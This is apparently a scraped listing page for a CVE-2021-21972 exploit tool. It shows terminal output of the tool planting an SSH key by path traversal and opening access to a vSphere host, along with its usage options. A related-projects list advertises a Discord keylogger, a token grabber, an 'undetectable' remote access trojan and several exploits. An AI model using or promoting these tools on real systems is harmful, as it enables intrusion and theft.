CVE-2021-21972

Last update: Nov 19, 2022

Overview

CVE-2021-21972

% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -e
[*] Creating tmp.tar containing ../../../../../home/vsphere-ui/.ssh/authorized_keys
[+] https://172.16.164.1 SUCCESS 
Login using 'ssh -i id_rsa [email protected]'

% python3 /tmp/CVE_2021_21972.py -i /tmp/urls.txt  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972

% python3 /tmp/CVE_2021_21972.py -u https://172.16.164.1  -n 8 -c
[+] https://172.16.164.1 is vulnerable to CVE-2021-21972

 % python3 CVE-2021-21972.py -h
Usage: CVE-2021-21972.py [options]

Options:
  -h, --help         show this help message and exit
  -i FILE            file containing list of urls
  -u URL, --url=URL  https://1.1.1.1
  -f FILENAME        
  -n NOOFTHREADS     
  -e, --exploit      
  -c, --check        
%

Owner

Keith Lee

GitHub Repository

Lightweight and beneficial Dependency Injection plugin for apscheduler

Implementation of dependency injection for apscheduler Prerequisites: apscheduler-di solves the problem since apscheduler doesn't support Dependency I

11 Dec 07, 2022

Huskee: Malware made in Python for Educational purposes

𝐇𝐔𝐒𝐊𝐄𝐄 Caracteristicas: Discord Token Grabber Wifi Passwords Grabber Googl

4 Aug 17, 2022

Scout Suite - an open source multi-cloud security-auditing tool,

Description Scout Suite is an open source multi-cloud security-auditing tool, which enables security posture assessment of cloud environments. Using t

5k Jan 05, 2023

CVE-2021-26855 SSRF Exchange Server

CVE-2021-26855 Brute Force EMail Exchange Server Timeline: Monday, March 8, 2021: Update Dumping content...(I'm not done, can u guy help me done this

117 Nov 28, 2022

Undetectable Keylogger that reports to Discord

FUD Keylogger That Reports To Discord This python script will capture all of the keystrokes within a given time frame and report them to a Discord Ser

36 Dec 20, 2022

The Web Application Firewall Paranoia Level Test Tool.

Quick WAF "paranoid" Doctor Evaluation WAFPARAN01D3 The Web Application Firewall Paranoia Level Test Tool. — From alt3kx.github.io Introduction to Par

22 Jul 25, 2022

A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

master_librarian A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities. To install requirements: $ sudo pyth

167 Dec 19, 2022

Auerswald COMpact 8.0B Backdoors exploit

CVE-2021-40859 Auerswald COMpact 8.0B Backdoors exploit About Backdoors were discovered in Auerswald COMpact 5500R 7.8A and 8.0B devices, that allow a

6 Sep 22, 2022

Simplify getting and using cookies from the browser to use in Python.

CookieCache Simplify getting and using cookies from the browser to use in Python. NOTE: All the logic to interface with the browsers is done by the Br

2 May 06, 2022

A python script written for lazy people to hack their school systen ;D

F-ck-the-system A python script written for lazy people to hack their school systen ;D Python voice notes writer This is a python script to record you

2 Jan 09, 2022

Windows Server 2016, 2019, 2022 Extracter & Recovery

Parsing files from Deduplicated volumes. It can also recover deleted files from NTFS Filesystem that were deduplicated. Installation git clone https:/

0 Aug 28, 2022

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

Vuln Impact An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files tha

2 Dec 30, 2021

SonicWALL SSL-VPN Web Server Vulnerable Exploit

44 Nov 15, 2022

OpenSource Poc && Vulnerable-Target Storage Box.

reapoc OpenSource Poc && Vulnerable-Target Storage Box. We are aming to collect different normalized poc and the vulerable target to verify it. Now re

560 Dec 23, 2022

Detection And Breaking With Python

Detection And Breaking IIIIIIIIIIIIIIIIIIII PPPPPPPPPPPPPPPPP VVVVVVVV VVVVVVVV I::::::::II::::::::I P:::::::

1 Dec 26, 2021

Arbitrium is a cross-platform, fully undetectable remote access trojan, to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding rules

About: Arbitrium is a cross-platform is a remote access trojan (RAT), Fully UnDetectable (FUD), It allows you to control Android, Windows and Linux an

861 Feb 18, 2021

CVE-2021-21972

Related tags

Overview

CVE-2021-21972

Owner

Keith Lee

Lightweight and beneficial Dependency Injection plugin for apscheduler

Huskee: Malware made in Python for Educational purposes

Scout Suite - an open source multi-cloud security-auditing tool,

CVE-2021-26855 SSRF Exchange Server

Undetectable Keylogger that reports to Discord

The Web Application Firewall Paranoia Level Test Tool.

A simple tool to audit Unix/*BSD/Linux system libraries to find public security vulnerabilities

Auerswald COMpact 8.0B Backdoors exploit

Simplify getting and using cookies from the browser to use in Python.

A python script written for lazy people to hack their school systen ;D

Windows Server 2016, 2019, 2022 Extracter & Recovery

Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution

SonicWALL SSL-VPN Web Server Vulnerable Exploit

OpenSource Poc && Vulnerable-Target Storage Box.

Detection And Breaking With Python

Arbitrium is a cross-platform, fully undetectable remote access trojan, to control Android, Windows and Linux and doesn't require any firewall exceptions or port forwarding rules

CVE-2021-40346 integer overflow enables http smuggling

GitHub Advance Security Compliance Action

A script based on sqlmap that uses sql injection vulnerabilities to traverse the existence of a file

信息收集自动化工具